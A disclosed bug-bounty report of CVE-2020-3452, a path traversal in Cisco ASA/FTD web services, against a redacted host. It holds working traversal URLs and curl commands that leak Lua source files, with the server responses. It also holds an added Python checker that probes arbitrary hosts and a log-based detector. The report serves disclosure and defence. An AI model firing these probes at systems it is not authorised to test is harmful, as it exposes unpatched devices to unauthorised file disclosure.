https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
Severity: High
## Vulnerability Details
**Summary:**
https://████████ is vulnerable to a [Read-Only Path Traversal Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86)
**Description:**
The query-string parameters of the `/+CSCOT+/translation-table` and `/+CSCOT+/oem-customization` GET handlers are not properly sanitized, so `../` sequences in them are honoured. This allows an unauthenticated client to read files inside the webroot directory that are not intended to be served directly, such as the Lua sources under `/+CSCOE+/`.
## Impact
An unauthenticated, remote attacker can read sensitive files located inside the webroot directory.
## Step-by-step Reproduction Instructions
### Using Browser
1. Visit https://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ in a browser and note that you are prompted to download a file. The file is the source code of `portal_inc.lua`, which is not normally accessible.
2. To verify you cannot access this file normally, visit https://██████/+CSCOE+/portal_inc.lua and verify that you receive a page that says "Wrong URL".
### Using Curl
1. In a linux terminal, send the following `curl` command:
```
curl -i -s -k -X $'GET' \
-H $'Host: ████████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
```
and
```
curl -i -s -k -X $'GET' \
-H $'Host: ████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
```
You should receive the following output:
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Fri, 24 Jul 2020 04:27:46 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
-- Copyright (C) 2006-2018 by Cisco Systems, Inc.
-- Created by [email protected]
dofile("/+CSCOE+/include/common.lua")
dofile("/+CSCOE+/include/browser_inc.lua")
local function compare(a,b) return a["order"]<b["order"] end;
function INTERNAL_PASSWORD_ENABLED(name)
return false;
```
2. To verify you should not be able to access this info, run the following `curl` command:
```
curl -i -s -k -X $'GET' \
-H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'https://███/%2bCSCOE%2b/portal_inc.lua'
```
You should receive the following output:
```
HTTP/1.1 500 Internal Error
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Fri, 24 Jul 2020 04:28:13 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
```
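The two curl requests above plus the control request are the whole test: the device is vulnerable only if a traversal URL returns `200` with Lua source while the direct URL for the same file is refused. The following script is an added example (not part of the original report) that encodes that decision so it can be run against a list of hosts or unit-tested offline. The probe URLs are taken verbatim from the steps above; the Lua markers used to recognise leaked source, the hostname argument and the `inconclusive` verdict are assumptions made for this example.

```python
"""
Checker for the two CVE-2020-3452 read-only path traversal endpoints
described in this report. Added example, not the report's own code.
"""
import ssl
import sys
import urllib.request
from urllib.error import HTTPError, URLError

# File used in the report; normally unreachable via a direct request.
TARGET = "+CSCOE+/portal_inc.lua"

# Assumed markers: the first lines of portal_inc.lua as shown in the report.
LUA_MARKERS = (b'dofile("/+CSCOE+/', b"-- Copyright (C)")


def probe_urls(host):
    """Return the two traversal URLs and the direct (control) URL for host."""
    base = f"https://{host}"
    return {
        "translation-table": (
            f"{base}/+CSCOT+/translation-table"
            "?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
        ),
        "oem-customization": (
            f"{base}/+CSCOT+/oem-customization"
            "?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
        ),
        "control": f"{base}/%2bCSCOE%2b/portal_inc.lua",
    }


def looks_like_lua(body):
    """True if the response body starts like the leaked Lua file."""
    return any(marker in body for marker in LUA_MARKERS)


def classify(traversal_results, control_status):
    """
    traversal_results: {name: (http_status, body_bytes)} for the traversal probes.
    control_status: HTTP status of the direct request for the same file.
    Returns (verdict, reasons); verdict is vulnerable / not-vulnerable / inconclusive.
    """
    reasons, leaked = [], []
    for name, (status, body) in traversal_results.items():
        if status == 200 and looks_like_lua(body):
            leaked.append(name)
            reasons.append(f"{name}: 200 with Lua source in body")
        else:
            reasons.append(f"{name}: status {status}, no Lua source")
    if not leaked:
        return "not-vulnerable", reasons
    # The control request must fail: if the file is also served directly,
    # the "traversal" proves nothing about access control.
    if control_status == 200:
        reasons.append("control: direct fetch also returned 200, no bypass shown")
        return "inconclusive", reasons
    reasons.append(f"control: direct fetch returned {control_status}")
    return "vulnerable", reasons


def fetch(url, timeout=10):
    """GET url and return (status, first 4 KiB of body). Certificate checks
    are disabled, as with curl -k in the report, because these appliances
    commonly present self-signed certificates."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read(4096)
    except HTTPError as e:          # 4xx/5xx still carry a body
        return e.code, e.read(4096)
    except URLError as e:           # connection-level failure
        return 0, str(e).encode()


def check_host(host):
    """Run both traversal probes and the control request against one host."""
    urls = probe_urls(host)
    results = {n: fetch(u) for n, u in urls.items() if n != "control"}
    control_status, _ = fetch(urls["control"])
    return classify(results, control_status)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: asa_traversal_check.py <host>")
    verdict, why = check_host(sys.argv[1])
    print(verdict)
    for line in why:
        print(" -", line)
```

Only the first 4 KiB of each body is read, which is enough to see the `dofile("/+CSCOE+/...")` lines without pulling the whole file; a `Content-Type: application/octet-stream` header alone is not treated as proof, since the same handler serves legitimate binary resources.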
## Screenshots in Burpsuite showing the requests succeeding and failing
### Success at https://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ which results in disclosure of the source code in `portal_inc.lua`
█████████
### Failure trying to access https://███████/+CSCOE+/portal_inc.lua
███
## Suggested Mitigation/Remediation Actions
Upgrade to a fixed release of Cisco ASA Software or Cisco FTD Software as listed in the Cisco advisory below. The advisory states that there are no workarounds; the vulnerable web services are reachable only on devices with an AnyConnect or WebVPN configuration enabled on an interface, so the exposure should be confirmed on each such device rather than assumed fixed fleet-wide.
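Until the upgrade is applied, exploitation attempts can be spotted in the access logs of a reverse proxy or load balancer in front of the appliance: both request shapes shown in this report carry `..` in a query parameter of the `/+CSCOT+/translation-table` or `/+CSCOT+/oem-customization` handler. The following detector is an added example, not part of the original report; the combined-log-format layout, the double URL-decoding and the sample log lines are constructed assumptions for illustration.

```python
"""
Detection of CVE-2020-3452 exploitation attempts in HTTP access logs.
Added example, not the report's own code. Matches the two request shapes
documented in the report after URL-decoding the query string.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed combined log format: client, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A path segment consisting of exactly ".."; "..." or "a..b" do not count.
DOTDOT = re.compile(r"(^|/)\.\.(/|$)")

# Parameters that the report shows carrying the traversal for each handler.
WATCHED = {
    "/+cscot+/translation-table": ("lang", "textdomain"),
    "/+cscot+/oem-customization": ("platform", "resource-type", "name"),
}


def decode_query(query):
    """parse_qs decodes once; decode again so %252e%252e (double-encoded) is caught too."""
    return {k: [unquote(unquote(x)) for x in v]
            for k, v in parse_qs(query, keep_blank_values=True).items()}


def is_cve_2020_3452_attempt(path):
    """Return (endpoint, parameter) for a traversal attempt, else None."""
    parts = urlsplit(path)
    route = unquote(unquote(parts.path)).lower()
    q = decode_query(parts.query)
    for suffix, params in WATCHED.items():
        if route.endswith(suffix):
            for param in params:
                if any(DOTDOT.search(v) for v in q.get(param, [])):
                    return suffix.rsplit("/", 1)[1], param
    return None


def scan_log(lines):
    """Return one finding per matching log line; status 200 suggests success."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = is_cve_2020_3452_attempt(m.group("path"))
        if finding:
            hits.append({"ip": m.group("ip"), "status": int(m.group("status")),
                         "endpoint": finding[0], "param": finding[1]})
    return hits


# Constructed sample lines: the two PoC requests, the control request and a
# benign translation-table request with a normal language code.
SAMPLE_LOG = [
    '203.0.113.10 - - [24/Jul/2020:04:27:46 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 1843',
    '203.0.113.10 - - [24/Jul/2020:04:27:50 +0000] "GET /+CSCOT+/oem-customization'
    '?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 1843',
    '198.51.100.7 - - [24/Jul/2020:04:28:13 +0000] "GET /%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 500 0',
    '198.51.100.7 - - [24/Jul/2020:04:29:01 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=anyconnect&default-language&lang=en HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The ASA's own syslog does not record the query string, which is why the example assumes a proxy log; a `200` on a matching line is the signal to treat the device's web-root contents as disclosed, while `4xx`/`5xx` matches are attempts worth attributing but not evidence of disclosure.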
## References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://twitter.com/aboul3la/status/1286012324722155525
## Impact
CVSS Score: Base 7.5
Vector: [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N](https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
## Report Stats
- Report ID: 940384
- State: Closed
- Substate: resolved
- Upvotes: 1